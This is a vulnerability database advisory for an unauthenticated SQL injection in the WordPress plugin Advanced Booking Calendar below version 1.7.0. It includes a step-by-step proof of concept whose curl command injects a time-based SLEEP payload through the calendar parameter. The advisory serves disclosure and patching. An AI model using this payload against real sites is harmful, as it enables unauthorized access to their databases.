Lucene search

K
wpvulndbCydaveWPVDB-ID:990D1B0A-DBD1-42D0-9A40-C345407C6FE0
HistoryFeb 28, 2022 - 12:00 a.m.

Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection

2022-02-2800:00:00
cydave
wpscan.com
11

EPSS

0.002

Percentile

52.0%

The plugin does not validate and escape the calendar parameter before using it in a SQL statement via the abc_booking_getSingleCalendar AJAX action (available to both unauthenticated and authenticated users), leading to an unauthenticated SQL injection

PoC

1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9) 2. Create a new calendar (the specific configuration shouldn’t matter - we just need the shortcode) 3. Create a new page with the shortcode you receive when you finish creating a calendar 4. Visit the just created page and extract the nonce (search for abc_nonce in the source) 5. Invoke the following command to induce a 5 second sleep curl -i http://example.com/wp-admin/admin-ajax.php --data ‘action=abc_booking_getSingleCalendar&abc;_nonce=7d55255d19&uniqid;=620ff6dacd7f8&month;=3&calendar;=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)’ Note: + “abc_nonce” is the required nonce + “uniqid” can be a random string + “month” should be provided and be a valid int (a month in a year) + “calendar” is the injection point

CPENameOperatorVersion
advanced-booking-calendarlt1.7.0

EPSS

0.002

Percentile

52.0%

Related for WPVDB-ID:990D1B0A-DBD1-42D0-9A40-C345407C6FE0